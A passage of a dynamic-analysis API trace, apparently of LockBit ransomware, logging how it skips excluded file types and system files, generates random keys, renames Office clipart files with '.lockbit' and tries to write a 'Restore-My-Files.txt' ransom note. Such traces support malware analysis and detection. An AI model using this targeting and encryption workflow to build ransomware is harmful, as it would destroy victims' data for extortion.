(lpString1=".frm", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.240] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.240] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.lockbit") returned 72 [0147.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174635.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.241] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.241] malloc (_Size=0x40068) returned 0x3e70008 [0147.241] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=9736) returned 1 [0147.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.242] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0147.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.249] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.249] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.250] free (_Block=0x1fa2ed8) [0147.250] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.250] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.250] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0174639.WMF", cAlternateFileName="")) returned 1 [0147.250] lstrcmpiW (lpString1=".", lpString2="J0174639.WMF") returned -1 [0147.250] lstrcmpiW (lpString1="..", lpString2="J0174639.WMF") returned -1 [0147.250] PathFindExtensionW (pszPath="J0174639.WMF") returned=".WMF" [0147.250] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.250] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.250] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.250] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.250] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.250] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.251] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.252] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.252] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0174639.WMF") returned 1 [0147.252] lstrcmpiW (lpString1="ntldr", lpString2="J0174639.WMF") returned 1 [0147.252] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0174639.WMF") returned 1 [0147.253] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0174639.WMF") returned -1 [0147.253] lstrcmpiW (lpString1="autorun.inf", lpString2="J0174639.WMF") returned -1 [0147.253] lstrcmpiW (lpString1="thumbs.db", lpString2="J0174639.WMF") returned 1 [0147.253] lstrcmpiW (lpString1="iconcache.db", lpString2="J0174639.WMF") returned -1 [0147.253] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.253] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned=".WMF" [0147.253] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.253] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.253] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.254] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.lockbit") returned 72 [0147.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174639.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.329] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.329] malloc (_Size=0x40068) returned 0x3df0008 [0147.329] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5100) returned 1 [0147.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.330] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.333] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.333] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.334] free (_Block=0x1fa2ed8) [0147.334] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.334] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.334] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6196, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0174952.JPG", cAlternateFileName="")) returned 1 [0147.334] lstrcmpiW (lpString1=".", lpString2="J0174952.JPG") returned -1 [0147.334] lstrcmpiW (lpString1="..", lpString2="J0174952.JPG") returned -1 [0147.334] PathFindExtensionW (pszPath="J0174952.JPG") returned=".JPG" [0147.335] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.335] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.335] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.336] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.336] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.337] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0174952.JPG") returned 1 [0147.337] lstrcmpiW (lpString1="ntldr", lpString2="J0174952.JPG") returned 1 [0147.337] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0174952.JPG") returned 1 [0147.337] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0174952.JPG") returned -1 [0147.337] lstrcmpiW (lpString1="autorun.inf", lpString2="J0174952.JPG") returned -1 [0147.337] lstrcmpiW (lpString1="thumbs.db", lpString2="J0174952.JPG") returned 1 [0147.337] lstrcmpiW (lpString1="iconcache.db", lpString2="J0174952.JPG") returned -1 [0147.337] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.337] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned=".JPG" [0147.337] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.337] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.337] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.337] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.338] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.338] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.338] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.338] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.338] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.lockbit") returned 72 [0147.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174952.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0147.339] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.339] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.339] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24982) returned 1 [0147.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.341] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.345] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.345] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.345] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.346] free (_Block=0x1fa2ed8) [0147.346] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.346] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.346] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb57d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0175361.JPG", cAlternateFileName="")) returned 1 [0147.346] lstrcmpiW (lpString1=".", lpString2="J0175361.JPG") returned -1 [0147.346] lstrcmpiW (lpString1="..", lpString2="J0175361.JPG") returned -1 [0147.346] PathFindExtensionW (pszPath="J0175361.JPG") returned=".JPG" [0147.346] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.346] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.346] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 